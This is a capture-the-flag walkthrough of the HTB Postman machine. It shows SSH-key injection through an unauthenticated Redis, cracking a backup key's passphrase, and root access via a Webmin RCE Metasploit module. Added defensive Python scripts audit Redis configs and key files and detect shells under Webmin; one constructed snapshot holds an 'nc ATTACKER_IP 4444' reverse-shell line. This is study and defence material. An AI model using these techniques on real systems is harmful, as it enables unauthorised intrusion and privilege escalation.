OSCP PREPARATIONS – HTB Postman

Postman is a retired HTB machine running Linux.
We begin by checking the services running on the target machine.


Classic Scan

Full TCP Scan

Full UDP Scan

The full port scan shows that Redis is running and that port 10000 is also open, so we look at both in more detail.

(Redis, Remote Dictionary Service, is a key-value NoSQL database. Because the data is kept in memory, it reads and writes very fast. NoSQL databases are generally used in web services with high data volumes.)
First, we check the web service running on port 80. We examine the source code but find no useful information.

Since the website gives nothing away, we run a directory (index) scan.

The scan does not yield anything useful either.
We focus on the Webmin service on port 10000 and the Redis service on port 6379, which did not show up in the classic scan but did in the detailed scan.
Browsing to port 10000 returns an error and redirects to the postman hostname, so I add the postman entry to /etc/hosts.

The Webmin login page now loads.

Default passwords were tried without result. Directory scans with Gobuster gave no valuable information.
I focused on the Redis side and connected to the target machine with redis-cli.

A Google search was made to see what can be done in a Redis pentest. The page https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis was tried first; the PHP reverse shell it describes was attempted but failed.

The HackTricks pentest page recommends trying to log in via SSH.
First, it asks you to create an SSH key pair with ssh-keygen.

We created our SSH key so that this would work:
chmod 600 id_rsa
Then we added two blank lines at the beginning and the end of the public key file and loaded it into Redis.

We then applied the Redis database settings for SSH given in HackTricks and connected with ssh.

We are allowed to SSH in, but we are not allowed to read the user flag.
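From the defender's side, the SSH-key-through-Redis trick above works only because of a handful of redis.conf settings, and it leaves a telltale file behind. The following Python script is an added example, not code from the writeup or from HackTricks: it audits a constructed weak config beside a hardened one, and it checks an authorized_keys file for the RDB header and binary padding that a Redis SAVE leaves in it. The directive names are real redis.conf options; both config texts and the key file contents are constructed samples.

```python
# Added example (not part of the original writeup): audit the redis.conf
# settings that make the "write an SSH key through Redis" technique possible,
# and check an authorized_keys file for signs that Redis wrote it.
# Both config texts are constructed samples; the directive names are real
# redis.conf options.
import re

WEAK_CONF = """
# constructed: what an exposed, unauthenticated Redis looks like
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """
# constructed: same instance, locked down
bind 127.0.0.1
port 6379
protected-mode yes
requirepass "constructed-long-random-password"
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_redis_conf(text):
    """Map each directive to the list of values seen for it (Redis applies the last one)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, val = line.partition(" ")
        conf.setdefault(key.lower(), []).append(val.strip())
    return conf


def audit_redis_conf(text):
    """Return human-readable findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get("bind", [])
    # no bind line, or a wildcard address, means the service answers on every interface
    exposed = not binds or any(tok in ("0.0.0.0", "*", "::") for v in binds for tok in v.split())
    password = conf.get("requirepass", [""])[-1].strip('"')
    protected = conf.get("protected-mode", ["yes"])[-1].lower() == "yes"
    if exposed and not password:
        if protected:
            findings.append("reachable from the network without a password; only protected-mode keeps remote clients out")
        else:
            findings.append("unauthenticated access from the network (no requirepass, protected-mode off)")
    # rename-command CONFIG "" disables the command; anything else leaves it usable
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG is exposed: a client can point dir/dbfilename anywhere the redis user can write")
    return findings


# a valid authorized_keys entry: optional options word, key type, base64 blob
KEY_LINE = re.compile(rb"^(\S+\s+)?(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+[A-Za-z0-9+/=]+")


def authorized_keys_findings(data: bytes):
    """Flag an authorized_keys that starts with the RDB header or contains non-key lines."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("file begins with the Redis RDB magic: it was produced by a Redis SAVE")
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        if not KEY_LINE.match(line):
            findings.append("non-key line: %r" % raw[:40])
    return findings


# constructed: roughly what a dump written by the technique looks like
INJECTED_KEYS = (
    b"REDIS0009\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x07ssh_key@"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCconstructedkey= attacker@example\n\n"
    b"\xff\x01\x02\x03\x04\x05\x06\x07\x08"
)
CLEAN_KEYS = b"# admin laptop\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIconstructed admin@example\n"

if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
    print("injected:", authorized_keys_findings(INJECTED_KEYS))
    print("clean:", authorized_keys_findings(CLEAN_KEYS))
```

Binding to localhost, setting requirepass and disabling CONFIG each break the chain on its own; the authorized_keys check is the after-the-fact signal, since sshd tolerates the binary padding around the key and the file looks normal to a casual `ls`.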

Let's run the linpeas.sh script for privilege escalation.
First, I transferred it from my own machine to the target machine.

We ran linpeas.sh.

After the general scan finishes, the id_rsa.bak file draws our attention.

We crack this SSH key's passphrase with john.

With the recovered password computer2008, we log in as the user Matt and obtain our user flag.
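The id_rsa.bak finding is a classic hygiene failure: a backup of a private key, readable by other users, protected only by a passphrase that john can guess. The Python script below is an added example (not from the writeup) of the check a defender would run on a host: it walks a directory tree, recognises private key files including backup copies, reads enough of the key format to say whether the key is passphrase-protected, and reports whether other users can read it. The directory layout and the key blobs it creates are constructed; only the header of the openssh-key-v1 format is parsed, which is all that is needed to read the cipher name.

```python
# Added example (not part of the original writeup): find private-key backups
# on a host and report whether they are passphrase-protected and who can read them.
# All files below are constructed in a temporary directory.
import base64
import os
import re
import stat
import struct
import tempfile

# id_rsa, id_ed25519, *.pem, *.key and their .bak/.old/~/.orig copies
KEY_NAME_RE = re.compile(r"^(id_(rsa|dsa|ecdsa|ed25519)|.*\.(pem|key))(\.bak|\.old|~|\.orig)?$")


def _read_string(buf, off):
    """Read one length-prefixed (big-endian uint32) string from an OpenSSH blob."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_protection(pem_text: str) -> str:
    """Return 'encrypted', 'plaintext' or 'not-a-key' for the body of a private key file."""
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in pem_text:
        body = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            return "not-a-key"
        # header layout: magic, ciphername, kdfname, kdfoptions, nkeys, ...
        cipher, _ = _read_string(blob, len(magic))
        return "plaintext" if cipher == b"none" else "encrypted"
    if re.search(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", pem_text):
        # legacy PEM keys announce encryption in a header line
        return "encrypted" if "Proc-Type: 4,ENCRYPTED" in pem_text else "plaintext"
    return "not-a-key"


def make_openssh_blob(cipher: bytes, kdf: bytes) -> str:
    """Build a minimal constructed openssh-key-v1 header, enough for key_protection()."""
    blob = b"openssh-key-v1\x00"
    for s in (cipher, kdf, b""):  # ciphername, kdfname, kdfoptions
        blob += struct.pack(">I", len(s)) + s
    blob += struct.pack(">I", 1)  # number of keys; the key material itself is omitted
    b64 = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----\n"


def audit_key_files(root: str):
    """Walk root and return (relative path, protection, readable-by-others) for every private key."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not KEY_NAME_RE.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                kind = key_protection(fh.read())
            if kind == "not-a-key":
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            others_can_read = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
            report.append((os.path.relpath(path, root), kind, others_can_read))
    return sorted(report)


def demo():
    """Lay out a constructed tree resembling the linpeas finding and audit it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "opt"))
    os.makedirs(os.path.join(root, "home", "user", ".ssh"))
    # world-readable backup of a passphrase-protected key, like id_rsa.bak
    bak = os.path.join(root, "opt", "id_rsa.bak")
    with open(bak, "w") as fh:
        fh.write(make_openssh_blob(b"aes256-ctr", b"bcrypt"))
    os.chmod(bak, 0o644)
    # correctly permissioned live key that has no passphrase at all
    live = os.path.join(root, "home", "user", ".ssh", "id_rsa")
    with open(live, "w") as fh:
        fh.write(make_openssh_blob(b"none", b"none"))
    os.chmod(live, 0o600)
    return audit_key_files(root)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Both rows in the demo output deserve attention: the backup is encrypted but readable by everyone, so its passphrase is only as strong as the user chose it (computer2008 in this box), while the live key is locked down on disk but has no passphrase at all. The fix is the same in both cases: no stray copies, mode 0600, and a passphrase that an offline wordlist attack will not find.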

Now, when we try to enter the root folder, we get a permission denied error. Our next step is to get root access for the root flag.
We run enumeration again to look for a privilege escalation method.

I could not get any results regarding privilege escalation, so I decided to investigate on the Metasploit side and searched for Webmin vulnerabilities:

Here I selected the webmin_package_updates_rce module, listed its required options with show options, filled them in with the set command, and ran it.

Then I run the exploit and I'm root. I then got the root flag.
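What the exploit above leaves on the box is easy to describe from the defender's side: Webmin runs as root, so a successful package-updates RCE shows up as a shell or a netcat-style tool running as a descendant of the miniserv.pl server process. The Python script below is an added example, not code from the writeup or from Webmin: it takes a process snapshot of the shape `ps -eo pid,ppid,user,comm,args` would give, finds the Webmin server, and reports the ancestry chain of every shell-like descendant. The snapshot is constructed, and the Webmin file paths in it are illustrative assumptions.

```python
# Added example (not part of the original writeup): report shell-like processes
# running under the Webmin server, the footprint of a successful RCE against it.
# The process snapshot is constructed; paths are illustrative assumptions.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "ncat", "socat"}


def shells_under_webmin(procs, marker="miniserv.pl"):
    """procs: iterable of (pid, ppid, user, comm, args).
    Returns one 'comm[pid] -> ...' chain per shell-like descendant of the Webmin server."""
    by_pid = {p[0]: p for p in procs}
    children = {}
    for p in procs:
        children.setdefault(p[1], []).append(p[0])
    # the Webmin server is whichever process has miniserv.pl in its command line
    roots = [p[0] for p in procs if marker in p[4]]
    findings = []

    def walk(pid, chain):
        for child in children.get(pid, []):
            proc = by_pid[child]
            new_chain = chain + [proc]
            if proc[3] in SHELL_LIKE:
                findings.append(" -> ".join(f"{q[3]}[{q[0]}]" for q in new_chain))
            walk(child, new_chain)

    for r in roots:
        walk(r, [by_pid[r]])
    return findings


# constructed snapshot: a CGI spawned by Webmin running a shell that runs netcat
SNAPSHOT = [
    (1, 0, "root", "systemd", "/sbin/init"),
    (900, 1, "root", "perl", "/usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf"),
    (1500, 900, "root", "perl", "/usr/share/webmin/package-updates/update.cgi"),
    (1501, 1500, "root", "sh", "sh -c CONSTRUCTED_INJECTED_COMMAND"),
    (1502, 1501, "root", "nc", "nc ATTACKER_IP 4444"),
    (1600, 900, "root", "perl", "/usr/share/webmin/proc/index.cgi"),
    (2000, 1, "redis", "redis-server", "/usr/bin/redis-server 0.0.0.0:6379"),
]

if __name__ == "__main__":
    for chain in shells_under_webmin(SNAPSHOT):
        print(chain)
```

Webmin legitimately runs Perl CGIs as children of miniserv.pl, which is why the script keys on shells and network tools rather than on any child at all; in a real deployment the set of commands Webmin is expected to spawn (package managers, for instance) should be baselined so that this check stays low-noise. Keeping Webmin patched and not reachable from untrusted networks removes the need for the check in the first place.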